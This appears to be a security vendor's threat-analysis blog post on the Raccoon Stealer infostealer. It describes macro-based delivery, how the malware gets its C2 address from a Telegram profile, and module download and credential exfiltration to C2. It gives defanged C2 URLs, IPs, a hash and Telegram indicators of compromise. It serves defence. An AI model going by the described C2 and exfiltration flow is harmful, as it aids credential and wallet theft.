Raccoon Stealer is an information stealer that, as its name suggests, steals user credentials and data stored in web browsers, mail applications, cryptocurrency wallets and Discord files
Non-technical Summary
User specific data stored in most commonly used web browsers is what Raccoon Stealer goes after. This includes cookies and all user credentials (login ids and passwords) saved on browsers, including cryptocurrency wallets. This malware is usually delivered through a document via spam mail which contains a macro. When the macro runs, it installs the malware. Communication is established with a specified malicious website and the malware collects data from the infected system and sends it to that specified website.
About the Threat
Raccoon Stealer was first observed in 2019 and is believed to originate in Russia. Openly advertised as a ‘Malware-as-a-Service’ (MaaS) on the dark web, it is well known in cybercriminal circles. It is also one of the most well administered and managed malware service.
Right from the different usage plans / subscriptions offered for sale, to its ‘customer’ service practices, it is efficiently managed as a well-run commercial venture. Its creators regularly update its features, offer trial periods and add-on services to the main infostealer. Each unit sold has a unique signature that can be traced and tracked by the creators.
This malware is initially dropped by an email through a macro in an attached document. Sometimes the Threat Actor may use another malware to deliver the payload. In some cases, it is also delivered when a victim downloads a cracked version of a software from dubious sources.
Security Analysts at SecneurX have observed a surge in Racoon Strealer in the wild in the last 3 months. It was very active during October – December 2021, as shown in the below chart. Over 1500 Raccoon Stealer samples were collected and analyzed during this period.
Chart 1: Surge in Raccoon Malware activity observed in SecneurX Research Lab
A notable observation during this surge is that Racoon Stealer is delivered as a payload using other malwares which already exist in the system. In the case of the sample described in this blog, the Racoon Stealer executable was dropped by other malwares which had already infiltrated the system. This sample of Racoon Stealer communicates with a Telegram profile to acquire the Control and Command URL which is in the form of an IP address.
The payload is then installed in a series of steps. All communication to and from the infected system is encrypted. Once fully installed, the malware collects its target data and exfiltrates it to the C2.
Some of the information that Raccoon Stealer gathers and exfiltrates are
System information of the affected system
Auto-fill credentials stored in web-browsers
Cryptocurrency wallets
Cookies
Web browser history
On completion of its objective, the malware comes with the option of auto-deleting itself and eliminating all traces of its actions.
SecneurX's Analysis of the Modus Operandi
Security Analysts at SecneurX studied the artifact - SHA256,
312f192e3506150ed6b6985f0c633708eca2cb1964d189a6fc1a05e096af415d
This is a .exe sample of the malware and is usually dropped from an infected document when the macros are enabled. Once run, the following actions take place.
Step 1: Acquire C2 Address
The dropped .exe file is executed by the malware and first communicates the following request: [ GET ] hxxp://telegalive[.]top/jdiamond13
In this request, hxxp://telegalive[.]top is the C2 and jdiamond13 is the Telegram user ID.
The response to the above request is shown in Figure 1 below.
Figure 1: Response from C2
The malicious domain, created by the malware authors, returns a Telegram profile of the URL (as show-in Figure 2 below). Raccoon Stealer then copies the value of the ‘content’ field highlighted in Figure 1 - "e2559fV46cjQG7j8UeXHTRGF49yaP1BIuc0-v54" from the Telegram page. It then trims a few characters from this value to get the actual data - "fV46cjQG7j8UeXHTRGF49yaP1BIuc". This is a RC4 encrypted C2 address.
Figure 2: Recreating the response and the encrypted C2 address in Telegram profile page
The malware then decrypts the above string using an embedded hardcoded key. This reveals the URL of C2 which is hxxp://91[.]219[.]236[.]49/, shown in Figure 3 below.
Figure 3: Decoding the encrypted C2 address
Step 2: Communication with C2 and download of configuration data
Using the retrieved IP address, it connects to C2 to post the unique victim ID and download the configuration data.
[ POST ] hxxp://91[.]219[.]236[.]49/
Figure 4: Communication with the C2
The encrypted unique victim ID is decrypted as shown in Figure 5.
Figure 5: Decoding the Communication with the C2
Figure 6: Decoding the Communication with the C2
Step 3: Download of Data Extraction Modules
It then downloads the data extraction module and additional modules for dependency through the following requests -
[ GET ] hxxp://91[.]219[.]236[.]49//l/f/x52vxXwB3dP17SpzzQGD/f66df01ec20c0cf373071d4d6494de1445530c2e
[ GET ] hxxp://91[.]219[.]236[.]49//l/f/x52vxXwB3dP17SpzzQGD/1f8a5bbeae4cfc7c9cb8071759d16e938f15d0d0
Figure 7: Downloading Modules for Data Extraction
Figure 8: Downloading additional modules in zip
Figure 9: Content of the Zip file
Step 4: Data Exfiltration
Once the victim’s credentials are extracted, the malware creates a Zip file and stores the information there. This file is then sent to the threat actor’s C2
Figure 10: Data Exfiltration
Figure 11: Contents of the Zip file
Indicators of Compromise
Telegram profile IOCs managed by the threat actor: agrybirdsgamerept, ararius809b, baldandbankrupt1, baudemars, bern33ster, bghost13, bimboDinotrex, brikitiki, capibar, ch0koalpengold, dodgeneontwinturbo, duglassa1, elonstack12, erndxesto, frombobu98s, fsp1boomgasio, h_electricryptors2, h_ghaibin2_1, hapikmalabar, hbackwoods1, hdmiprapor, hellobyegain, hiioBlacklight1, hoverpattern31, indosgigabitbet, iolitena111, jabbahatt121, jagressor_kz, jamesonkamerun, jdiamond13, jiiDante, johnyes13